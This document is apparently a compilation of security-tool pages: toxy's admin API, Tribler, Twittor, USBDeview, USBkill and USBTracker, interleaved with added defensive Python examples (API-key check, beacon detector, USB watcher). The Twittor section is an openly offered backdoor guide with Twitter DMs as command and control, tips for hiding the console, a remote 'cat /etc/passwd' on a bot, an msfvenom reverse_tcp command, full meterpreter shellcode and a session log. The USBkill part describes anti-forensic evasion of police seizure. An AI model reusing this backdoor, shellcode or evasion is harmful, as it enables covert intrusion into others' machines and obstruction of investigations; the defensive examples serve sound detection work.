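The check a protected admin server performs on every request, as an added Python illustration (not toxy's code, which is JavaScript): the key is taken from either the API-Key header or the Authorization header and compared in constant time. The README only names the two headers, so accepting "Authorization: Bearer <key>" next to a bare value, and the 200/401 status codes, are assumptions of this example.

```python
"""API-key check in the style of toxy's admin server authorization.

Added Python illustration, not toxy's code (toxy is JavaScript). The README
states only that clients send the key via the API-Key or Authorization
header; accepting "Authorization: Bearer <key>" as well as a bare value,
and the 200/401 status codes, are assumptions of this example."""
import hmac
from typing import Mapping, Optional


def presented_key(headers: Mapping[str, str]) -> Optional[str]:
    """Return the key the client sent, or None if neither header is present.

    Header names are compared case-insensitively, as HTTP requires, and
    API-Key wins when both headers are set."""
    lowered = {name.lower(): value for name, value in headers.items()}
    if "api-key" in lowered:
        return lowered["api-key"].strip()
    auth = lowered.get("authorization")
    if auth is None:
        return None
    scheme, _, rest = auth.strip().partition(" ")
    if scheme.lower() == "bearer" and rest.strip():
        return rest.strip()           # assumed form: "Bearer <key>"
    return auth.strip()               # bare key in the Authorization header


def is_authorized(headers: Mapping[str, str], expected_key: str) -> bool:
    """True only when the presented key equals expected_key.

    hmac.compare_digest takes the same time whether the strings differ in
    the first byte or the last, so response timing does not reveal how much
    of a guessed key was right; a plain == comparison stops at the first
    mismatch and leaks exactly that."""
    key = presented_key(headers)
    if key is None:
        return False
    return hmac.compare_digest(key.encode("utf-8"), expected_key.encode("utf-8"))


def admin_status(headers: Mapping[str, str], expected_key: str) -> int:
    """HTTP status an admin request should receive: 200 when the key
    matches, 401 otherwise. A missing key and a wrong key get the same
    answer, so the response does not distinguish the two cases."""
    return 200 if is_authorized(headers, expected_key) else 401


if __name__ == "__main__":
    print(admin_status({"API-Key": "s3cr3t"}, "s3cr3t"))        # 200
    print(admin_status({"Authorization": "Bearer nope"}, "s3cr3t"))  # 401
```

Whatever server framework sits in front, the same three steps apply: normalise header names, reject on absence, and compare with hmac.compare_digest rather than ==.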

API
Hierarchy:
Servers - Managed toxy instances
  Rules - Globally applied rules
  Poisons - Globally applied poisons
    Rules - Poison-specific rules
  Routes - List of configured routes
    Route - Object for each specific route
      Rules - Route-level registered rules
      Poisons - Route-level registered poisons
        Rules - Route-level poison-specific rules
GET /
Servers
GET /servers
GET /servers/:id
Rules
GET /servers/:id/rules
POST /servers/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}

DELETE /servers/:id/rules
GET /servers/:id/rules/:id
DELETE /servers/:id/rules/:id
Poisons
GET /servers/:id/poisons
POST /servers/:id/poisons
Accepts: application/json
Example payload:
{
"name": "latency",
"phase": "outgoing",
"options": { "jitter": 1000 }
}

DELETE /servers/:id/poisons
GET /servers/:id/poisons/:id
DELETE /servers/:id/poisons/:id
GET /servers/:id/poisons/:id/rules
POST /servers/:id/poisons/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}

DELETE /servers/:id/poisons/:id/rules
GET /servers/:id/poisons/:id/rules/:id
DELETE /servers/:id/poisons/:id/rules/:id
Routes
GET /servers/:id/routes
POST /servers/:id/routes
Accepts: application/json
Example payload:
{
"path": "/foo", // Required
"method": "GET", // use ALL for all the methods
"forward": "http://my.server" // Optional custom forward server URL
}

DELETE /servers/:id/routes
GET /servers/:id/routes/:id
DELETE /servers/:id/routes/:id
Route rules
GET /servers/:id/routes/:id/rules
POST /servers/:id/routes/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}

DELETE /servers/:id/routes/:id/rules
GET /servers/:id/routes/:id/rules/:id
DELETE /servers/:id/routes/:id/rules/:id
Route poisons
GET /servers/:id/routes/:id/poisons
POST /servers/:id/routes/:id/poisons
Accepts: application/json
Example payload:
{
"name": "latency",
"phase": "outgoing",
"options": { "jitter": 1000 }
}

DELETE /servers/:id/routes/:id/poisons
GET /servers/:id/routes/:id/poisons/:id
DELETE /servers/:id/routes/:id/poisons/:id
GET /servers/:id/routes/:id/poisons/:id/rules
POST /servers/:id/routes/:id/poisons/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}

DELETE /servers/:id/routes/:id/poisons/:id/rules
GET /servers/:id/routes/:id/poisons/:id/rules/:id
DELETE /servers/:id/routes/:id/poisons/:id/rules/:id
Programmatic API
The built-in HTTP admin server also provides a simple interface
open to extensibility and hacking purposes. For instance, you
can plug in additional middleware to the admin server, or
register new routes.
toxy.admin([ opts ])
Returns: Admin
Supported options:
apiKey string - Optional API key to protect the server
port number - Optional. TCP port to listen on
cors boolean - Enable CORS for web browser access
middleware array<function> - Plug in additional middleware
ssl object - Node.js HTTPS server TLS options.
Admin#listen([ port, host ])
Start listening on the network.
Admin#manage(toxy)
Manage a toxy server instance.
Admin#find(toxy)
Find a toxy instance. Accepts toxy server ID or toxy instance.
Admin#remove(toxy)
Stop managing a toxy instance.
Admin#use(...middleware)
Register a middleware.
Admin#param(...middleware)
Register a param middleware.
Admin#get(path, [ ...middleware ])
Register a GET route.
Admin#post(path, [ ...middleware ])
Register a POST route.
Admin#put(path, [ ...middleware ])
Register a PUT route.
Admin#delete(path, [ ...middleware ])
Register a DELETE route.
Admin#patch(path, [ ...middleware ])
Register a PATCH route.
Admin#all(path, [ ...middleware ])
Register a route accepting any HTTP method.
Admin#middleware(req, res, next)
Middleware to plug in with connect/express.
Admin#close(cb)
Stop the server.

Download Toxy
TRIBLER - DOWNLOAD TORRENTS USING TOR-INSPIRED
ONION ROUTING
Tribler is a research project of Delft University of Technology.
Tribler was created over nine years ago as a new open source
Peer-to-Peer file sharing program. During this time over one
million users have installed it successfully and three
generations of Ph.D. students tested their algorithms in the real
world.
Tribler is the first client which continuously improves upon the
aging BitTorrent protocol from 2001 and addresses its flaws.
We expanded it with, amongst others, streaming from magnet
links, keyword search for content, channels and reputation
management. All these features are implemented in a
completely distributed manner, not relying on any centralized
component. Still, Tribler manages to remain fully backwards
compatible with BitTorrent.
Work on Tribler has been supported by multiple Internet
research European grants. In total we received 3,538,609 Euro
in funding for our open source self-organising systems
research.
Roughly 10 to 15 scientists and engineers work on it full-time.
Our ambition is to make darknet technology, security and
privacy the default for all Internet users. As of 2013 we have
received code from 46 contributors and 143.705 lines of code.

VISION & MISSION
"Push the boundaries of self-organising systems, robust
reputation systems and craft collaborative systems with millions
of active participants under continuous attack from spammers
and other adversarial entities."

Download Tribler
TWITTOR - A FULLY FEATURED BACKDOOR THAT USES
TWITTER AS A C&C SERVER
A stealthy Python based backdoor that uses Twitter (Direct
Messages) as a command and control server. This project has
been inspired by Gcat which does the same but using a Gmail
account.
Setup
For this to work you need:
A Twitter account (use a dedicated account! Do not
use your personal one!)
Register an app on Twitter with Read, write, and direct
messages access levels.
Install the dependencies:
$ pip install -r requirements.txt
This repo contains two files:
twittor.py which is the client
implant.py the actual backdoor to deploy
In both files, edit the access token part and add the ones that
you previously generated:
CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
You're probably going to want to compile implant.py into an
executable using PyInstaller. In order to remove the console
when compiling with PyInstaller, the flags --noconsole --onefile will help. Just saying.
Usage
In order to run the client, launch the script.
$ python twittor.py
You'll then get into an 'interactive' shell which offers a few
commands that are:
$ help
refresh - refresh C&C control
list_bots - list active bots
list_commands - list executed commands
!retrieve <jobid> - retrieve jobid command
!cmd <MAC ADDRESS> command - execute the command on the bot
!shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
help - print this usage
exit - exit the client
$

Once you've deployed the backdoor on a couple of
systems, you can check available clients using the list_bots
command:
$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-withUbuntu-14.04-precise
$

The output is the MAC address, which is used to uniquely
identify the system, but it also gives you OS information the
implant is running on. In that case a Linux box.
Let's issue a command to an implant:
$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$

Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd;
the script then outputs the jobid that we can use to
retrieve the output of that command.
Let's get the results!
$ !retrieve UMW07r2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/


lib/gnats:/bin/sh
(...)

Command to use in that case is !retrieve followed by the


jobid from the command.
Refresh results
In order to retrieve new bots/command outputs but also force
the client to refresh the results, use the refresh command.
$ refresh
[+] Sending command to retrieve alive bots
[+] Sleeping 10 secs to wait for bots
$

This will send a PING request and wait 10 seconds for them to
answer. Direct messages will then be parsed: the bot list will be
refreshed, and so will the command list, including new command
outputs.
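From the defender's side, the channel described above has a recognisable shape: an implant that waits on Direct Messages has to poll the Twitter API at a steady cadence from a process that is not a browser. The following added Python example (not part of Twittor) flags that cadence in proxy logs. The log format (time, client IP, destination host, user agent), every sample line, the 60-second polling interval and the thresholds are constructed assumptions to tune against real data; the page itself only states the client-side 10-second wait.

```python
"""Flag hosts that poll a web service at machine-regular intervals, the
traffic shape a Direct-Message C2 implant like Twittor produces.

Added detection example, not part of Twittor. The log format (time, client
IP, destination host, user agent), every sample line, the 60 s implant
cadence and the thresholds are constructed assumptions for this demo."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log: 10.0.0.99 polls api.twitter.com once a minute with a
# scripting user agent; 10.0.0.7 browses twitter.com at irregular times.
SAMPLE_LOG = """\
2015-09-08T10:19:04Z 10.0.0.99 api.twitter.com python-requests/2.7.0
2015-09-08T10:19:10Z 10.0.0.7 twitter.com Mozilla/5.0 (Windows NT 6.1)
2015-09-08T10:20:04Z 10.0.0.99 api.twitter.com python-requests/2.7.0
2015-09-08T10:21:03Z 10.0.0.99 api.twitter.com python-requests/2.7.0
2015-09-08T10:21:40Z 10.0.0.7 twitter.com Mozilla/5.0 (Windows NT 6.1)
2015-09-08T10:22:05Z 10.0.0.99 api.twitter.com python-requests/2.7.0
2015-09-08T10:23:04Z 10.0.0.99 api.twitter.com python-requests/2.7.0
2015-09-08T10:24:04Z 10.0.0.99 api.twitter.com python-requests/2.7.0
2015-09-08T10:29:31Z 10.0.0.7 twitter.com Mozilla/5.0 (Windows NT 6.1)
"""


def parse_log(text):
    """Yield (timestamp, src, host, user_agent) tuples from the log text."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, host, ua = line.split(" ", 3)
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, host, ua


def looks_scripted(user_agent):
    """Browsers announce themselves with 'Mozilla/'; an implant's HTTP library does not."""
    return not user_agent.startswith("Mozilla/")


def find_beacons(text, min_requests=5, max_jitter=0.2, max_interval=600):
    """Return {(src, host): {"interval": mean gap, "jitter": cv, "scripted": bool}}
    for client/host pairs whose request spacing looks sleep()-driven.

    jitter is the coefficient of variation (population stdev / mean) of the
    gaps between consecutive requests: human browsing gives large values,
    a fixed polling loop a value near zero."""
    stamps = defaultdict(list)
    agents = {}
    for ts, src, host, ua in parse_log(text):
        stamps[(src, host)].append(ts)
        agents[(src, host)] = ua
    hits = {}
    for pair, times in stamps.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg == 0 or avg > max_interval:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            hits[pair] = {"interval": avg, "jitter": jitter,
                          "scripted": looks_scripted(agents[pair])}
    return hits


if __name__ == "__main__":
    for (src, host), info in find_beacons(SAMPLE_LOG).items():
        print("%s -> %s every %.0fs (jitter %.3f, scripted UA: %s)"
              % (src, host, info["interval"], info["jitter"], info["scripted"]))
```

On the constructed sample only 10.0.0.99 is reported: six requests to api.twitter.com about 60 seconds apart with a jitter near 0.02 and a non-browser user agent. Treat the result as a triage list, not a verdict: legitimate agents (mail clients, monitoring) also poll regularly, so the destination, the process owning the socket and the user agent decide what an analyst does next.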
Retrieve previous commands
As I said earlier, (previous) commands will be retrieved from
older direct messages (limit is 200) and you can actually
retrieve/see them by using the list_commands command:
$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$

Running shellcode (Windows hosts)
This option might be handy in order to retrieve a meterpreter
session, and this article becomes really useful.
Generate your meterpreter shellcode, like:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python

(...)
Payload size: 299 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"

Extract the shellcode and send it to the specified bot using
the !shellcode command!
$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
[+] Sent shellcode with jobid: xdr7mtN
$

Et voilà!
msf exploit(handler) > exploit
[*] Started reverse handler on 10.0.0.1:3615
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
[*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400
meterpreter > getuid
Server username: WIN-XXXXXXXXX\PaulSec

Open a beer and enjoy your reverse meterpreter shell.

Download Twittor
USBDEVIEW V2.45 - VIEW ALL INSTALLED/CONNECTED
USB DEVICES ON YOUR SYSTEM
USBDeview is a small utility that lists all USB devices that are
currently connected to your computer, as well as all USB
devices that you previously used.
For each USB device, extended information is displayed:
device name/description, device type, serial number (for mass
storage devices), the date/time that the device was added,
VendorID, ProductID, and more...
USBDeview also allows you to uninstall USB devices that you
previously used, disconnect USB devices that are currently
connected to your computer, as well as disable and enable
USB devices.
You can also use USBDeview on a remote computer, as long
as you log in to that computer with an admin user.
Using USBDeview
USBDeview doesn't require any installation process or
additional DLL files. Just copy the executable file
(USBDeview.exe) to any folder you like, and run it.
The main window of USBDeview displays all USB devices
installed on your system. You can select one or more items,
and then disconnect (unplug) them, uninstall them, or just save
the information into a text/xml/html file.
USBDeview Columns Description
Device Name: Specifies the device name. For some
devices, this column may display a meaningless name, like
"USB Device". If the device name is meaningless, try to
look at the Description column.
Device Description: The description of the device.
Device Type: The device type, according to the USB class
code. For more information about USB classes: USB
Class Codes.
Connected: Specifies whether the device is currently
connected to your computer. If the device is connected,
you can use the 'Disconnect Selected Devices' option (F9)
to disconnect the device.
Safe To Unplug: Specifies whether it's safe to unplug the
device from the USB plug without disconnecting it first. If
the value of this column is false, and you want to unplug
this device, you must first disconnect this device by using
the 'Disconnect Selected Devices' option (F9) of the
USBDeview utility, or by using the 'Unplug or Eject
Hardware' utility of the Windows operating system.
Drive Letter: Specifies the drive letter of the USB device.
This column is only relevant to USB flash memory devices
and to USB CD/DVD drives. Be aware that USBDeview
cannot detect drive letters of USB hard disks.
Serial Number: Specifies the serial number of the device.
This column is only relevant to mass storage devices
(flash memory devices, CD/DVD drives, and USB hard disks).
Created Date: Specifies the date/time that the device was
installed. In most cases, this date/time value represents
the time that you first plugged the device into the USB port.
However, be aware that in some circumstances this value
may be wrong. Also, on Windows 7, this value is
initialized with the current date/time on every reboot.
Last Plug/Unplug Date: Specifies the last time that you
plugged/unplugged the device. This date value is lost
when you restart the computer.
VendorID/ProductID: Specifies the VendorID and
ProductID of the device. For an unofficial list of VendorID/
ProductID, click here.
USB Class/Subclass/Protocol: Specifies the Class/
Subclass/Protocol of the device according to the USB
specifications. For more information about USB classes:
USB Class Codes.
Hub/Port: Specifies the hub number and port number that
the device was plugged into. This value is empty for mass
storage devices.
Notice: According to user reports, on some systems the 'Last
Plug/Unplug Date' and the 'Created Date' values are initialized
after reboot. This means that these columns may display the
reboot time instead of the correct date/time.

Download USBDeview v2.45
USBKILL - ANTI-FORENSIC KILL-SWITCH THAT WAITS
FOR A CHANGE ON YOUR USB PORTS
USBkill is an anti-forensic kill-switch that waits for a change on
your USB ports and then immediately shuts down your
computer.
To run:
sudo python usbkill.py

Why?
Some reasons to use this tool:
In case the police or other thugs come busting in (or steal
your laptop from you when you are at a public library as
happened to Ross). The police commonly use a "mouse
jiggler" to keep the screensaver and sleep mode from
activating.
You don't want someone to retrieve documents (such as
private keys) from your computer or install malware/
backdoors via USB.
You want to improve the security of your (Full Disk
Encrypted) home or corporate server (e.g. your
Raspberry).
[!] Important: Make sure to use (partial) disk encryption!
Otherwise they will get in anyway.

Tip: Additionally, you may use a cord to attach a USB key to
your wrist. Then insert the key into your computer and start
usbkill. If they steal your computer, the USB will be removed
and the computer shuts down immediately.
Feature List
(version 1.0-rc.2)
Compatible with Linux, *BSD and OS X.
Shutdown the computer when there is USB activity.
Customizable. Define which commands should be
executed just before shut down.
Ability to whitelist a USB device.
Ability to change the check interval (default: 250ms).
Ability to melt the program on shut down.
Works with sleep mode (OS X).
No dependency except srm. sudo apt-get install secure-delete
Sensible defaults
Supported command line arguments (mainly for devs):
--no-shut-down: Execute all the (destructive) commands
you defined in settings.ini, but don't turn off the computer.
--cs: Copy program folder settings.ini to /etc/usbkill/settings.ini
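The detection core of the tool described above, as an added Python example rather than usbkill's own code: snapshot the attached devices at start, poll at the check interval, and fire when a device that is not whitelisted appears or a device that was present at start (the wrist-cord key) disappears. The sysfs reader assumes a Linux /sys/bus/usb/devices tree; the action taken on a change is injected and defaults to recording it, so the demo never shuts anything down, and the vendor/product identifiers in the demo are constructed.

```python
"""Detection core of a USBkill-style kill switch: snapshot the USB devices
present at start, poll at the check interval, fire on any change that is
not whitelisted. Added example, not usbkill's own code.

sysfs_devices() assumes Linux's /sys/bus/usb/devices layout; on other
systems pass your own snapshot function to watch(). The action taken on a
change is injected; the demo only records it."""
import os
import time
from typing import Callable, Iterable, List, Optional, Set


def sysfs_devices(root: str = "/sys/bus/usb/devices") -> Set[str]:
    """Identify each attached device as 'vendor:product:serial'.

    Interface nodes have no idVendor file and are skipped; a device
    without a serial file just gets an empty serial."""
    found: Set[str] = set()
    if not os.path.isdir(root):
        return found
    for entry in os.listdir(root):
        base = os.path.join(root, entry)
        try:
            with open(os.path.join(base, "idVendor")) as fv, \
                 open(os.path.join(base, "idProduct")) as fp:
                vendor, product = fv.read().strip(), fp.read().strip()
        except OSError:
            continue
        try:
            with open(os.path.join(base, "serial")) as fs:
                serial = fs.read().strip()
        except OSError:
            serial = ""
        found.add("%s:%s:%s" % (vendor, product, serial))
    return found


def changed_devices(baseline: Set[str], current: Set[str],
                    whitelist: Iterable[str] = ()) -> Set[str]:
    """Devices added or removed since the baseline, minus the whitelist.

    Removal counts too: the wrist-cord trick relies on the key that was
    present at start going away."""
    return (current ^ baseline) - set(whitelist)


def watch(list_devices: Callable[[], Set[str]],
          on_change: Callable[[Set[str]], None],
          whitelist: Iterable[str] = (),
          interval: float = 0.25,
          max_polls: Optional[int] = None) -> int:
    """Poll until a non-whitelisted change appears; return the polls made.

    interval defaults to usbkill's 250 ms check interval. max_polls bounds
    the loop for demos and tests; None means run until triggered."""
    baseline = list_devices()
    polls = 0
    while max_polls is None or polls < max_polls:
        time.sleep(interval)
        polls += 1
        delta = changed_devices(baseline, list_devices(), whitelist)
        if delta:
            on_change(delta)  # the real tool runs its settings.ini commands, then shuts down
            return polls
    return polls


def scripted_source(snapshots: List[Set[str]]) -> Callable[[], Set[str]]:
    """Constructed device source: hands out the snapshots in order, then
    keeps returning the last one."""
    state = {"i": 0}

    def next_snapshot() -> Set[str]:
        snap = snapshots[min(state["i"], len(snapshots) - 1)]
        state["i"] += 1
        return snap
    return next_snapshot


def demo():
    """Constructed sequence: a keyboard at start, a whitelisted mouse
    appears (ignored), then an unknown flash drive appears (triggers)."""
    keyboard, mouse, stick = "046d:c31c:", "046d:c077:", "0951:1666:ABCDEF"
    source = scripted_source([{keyboard}, {keyboard, mouse}, {keyboard, mouse, stick}])
    fired: List[Set[str]] = []
    polls = watch(source, fired.append, whitelist=[mouse], interval=0.001, max_polls=10)
    return polls, fired


if __name__ == "__main__":
    print(demo())
```

Running demo() reports two polls and one trigger carrying only the unknown stick, because the mouse was whitelisted. For a real deployment, replace the source with sysfs_devices and the callback with the commands you want run before shutdown; the symmetric difference is what makes both insertion and removal count.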

Download USBkill
USBTRACKER - SCRIPT TO TRACK USB DEVICES
EVENTS AND ARTIFACTS IN A WINDOWS OS
USBTracker is a quick & dirty coded incident response and
forensics Python script to dump USB related information and
artifacts from a Windows OS (Vista and later).
Special recommendations
USBTracker reads some protected log files and needs to be run
with administrator permissions. The simplest way to run
USBTracker is to launch a CMD or Powershell console with a
right click "run as administrator", then execute the script /
exe inside it.
Executable version
If you don't have a Python distribution installed on the computer
you want to analyze with USBTracker, you can also download
an .exe "compiled" version of the script (built with PyInstaller) from
the repository.
Dependencies
USBTracker is developed with Python 2.7 and has not been
tested with other Python versions. It uses the great Python
module Python-evtx of Willi Ballenthin. So, please don't forget
to install it before using USBTracker.

Usage
Help
If you want to display help, just use the "-h" flag:
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -h
USBTracker alpha
2015 - Sysinsider
USBTracker it's a free tool which allow you to extract
some USB artifacts from a Windows OS (Vista and later).
You must execute USBTracker inside a CMD/Powershell
console runnnig with administror privileges to be able to
dump some
log files artifacts.
usage: usbtracker.py [-h] [-u | -uu] [-nh] [-df] [-x]
optional arguments:
-h, --help                  show this help message and exit
-u, --usbstor               Dump USB artifacts from USBSTOR registry
-uu, --usbstor-verbose      Dump USB detailed artifacts from USBSTOR registry.
-nh, --no-hardwareid        Hide HardwareID value during a USBSTOR detailed artifacts registry dump.
-df, --driver-frameworks    Dump USB artifacts and events from the Windows DriverFrameworks Usermode log.
-x, --raw-xml-event         Display event results in raw xml (with -df option only).

List known USB storage devices
If you want to list all USB storage devices known by Windows,
use the "-u" flag to get a simple list:
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -u
USBTracker alpha
2015 - Sysinsider
USBTracker it's a free tool which allow you to extract
some USB artifacts from a Windows OS (Vista and later).
You must execute USBTracker inside a CMD/Powershell
console runnnig with administror privileges to be able to
dump some
log files artifacts.
USB device(s) known by this computer :
=====================================
CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GP08NU20&Rev_1.00
Disk&Ven_Generic&Prod_STORAGE_DEVICE&Rev_0272
Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_1.00
Disk&Ven_WD&Prod_5000AAV_External&Rev_1.65
Disk&Ven_WD&Prod_Elements_10B8&Rev_1012
Disk&Ven_WD&Prod_My_Book_1140&Rev_1012
Other&Ven_WD&Prod_SES_Device&Rev_1012

or the "-uu" flag if you want to get a detailed list:
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -uu
USBTracker alpha
2015 - Sysinsider
USBTracker it's a free tool which allow you to extract
some USB artifacts from a Windows OS (Vista and later).
You must execute USBTracker inside a CMD/Powershell
console runnnig with administror privileges to be able to
dump some
log files artifacts.
USB device(s) known by this computer :
=====================================
CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GP08NU20&Rev_1.00
Serial : 00101016400086C55&0
DeviceDesc : @cdrom.inf,%gencdrom_devdesc%;CD-ROM Drive
Capabilities : 16
HardwareID : [u'USBSTOR\\CdRomHL-DT-STDVDRAM_GP08NU20_1.00', u'USBSTOR\\CdRomHL-DT-STDVDRAM_GP08NU20_', u'USBSTOR\\CdRomHL-DT-ST', u'USBSTOR\\HL-DT-STDVDRAM_GP08NU20_1', u'HL-DT-STDVDRAM_GP08NU20_1', u'USBSTOR\\GenCdRom', u'GenCdRom']
CompatibleIDs : [u'USBSTOR\\CdRom', u'USBSTOR\\RAW']
ContainerID : {def10b43-2e59-5e9f-8ca6-ffab1cfc9afa}
Service : cdrom
ClassGUID : {4d36e965-e325-11ce-bfc1-08002be10318}
ConfigFlags : 0
Driver : {4d36e965-e325-11ce-bfc1-08002be10318}\0001
Class : CDROM
Mfg : @cdrom.inf,%genmanufacturer%;(Standard CD-ROM drives)
FriendlyName : HL-DT-ST DVDRAM GP08NU20 USB Device
======================================================================
Disk&Ven_Generic&Prod_STORAGE_DEVICE&Rev_0272
Serial : 000000000272&0
DeviceDesc : @disk.inf,%disk_devdesc%;Disk drive
Capabilities : 16
HardwareID : [u'USBSTOR\\DiskGeneric_STORAGE_DEVICE__0272', u'USBSTOR\\DiskGeneric_STORAGE_DEVICE__', u'USBSTOR\\DiskGeneric_', u'USBSTOR\\Generic_STORAGE_DEVICE__0', u'Generic_STORAGE_DEVICE__0', u'USBSTOR\\GenDisk', u'GenDisk']
CompatibleIDs : [u'USBSTOR\\Disk', u'USBSTOR\\RAW']
ContainerID : {a3ce89cb-5363-54a8-8d4f-af2374c200a5}
ConfigFlags : 0
ClassGUID : {4d36e967-e325-11ce-bfc1-08002be10318}
Driver : {4d36e967-e325-11ce-bfc1-08002be10318}\0004
Class : DiskDrive
Mfg : @disk.inf,%genmanufacturer%;(Standard disk drives)
Service : disk
FriendlyName : Generic STORAGE DEVICE USB Device
======================================================================
...

Dumping events and artifacts from the Microsoft-Windows-DriverFrameworks-UserMode%4Operational.evtx log file:
To dump all USB related events (currently EventID 2003, 2004,
2005, 2010, 2100, 2102 & 2105) from the Microsoft-Windows-DriverFrameworks-UserMode%4Operational.evtx log file, use
the "-df" flag.
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -df
USBTracker alpha
2015 - Sysinsider
USBTracker it's a free tool which allow you to extract
some USB artifacts from a Windows OS (Vista and later).
You must execute USBTracker inside a CMD/Powershell
console runnnig with administror privileges to be able to
dump some
log files artifacts.
USB related event(s) found in the event log :
=============================================
UTC Time : 2015-01-18 20:31:34.138399
EventID : 2003 | Description : UMDFHostDeviceArrivalBegin | Computer : 37L4247F27-25 | User SID : S-1-5-19 | User : LocalService
Lifetime : 8c076f4d-6405-4414-a829-ee44a94e3893
WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#
UTC Time : 2015-01-18 20:31:34.138399
EventID : 2010 | Description : UMDFHostDeviceArrivalEnd | Computer : 37L4247F27-25 | User SID : S-1-5-19 | User : LocalService
Lifetime : 8c076f4d-6405-4414-a829-ee44a94e3893
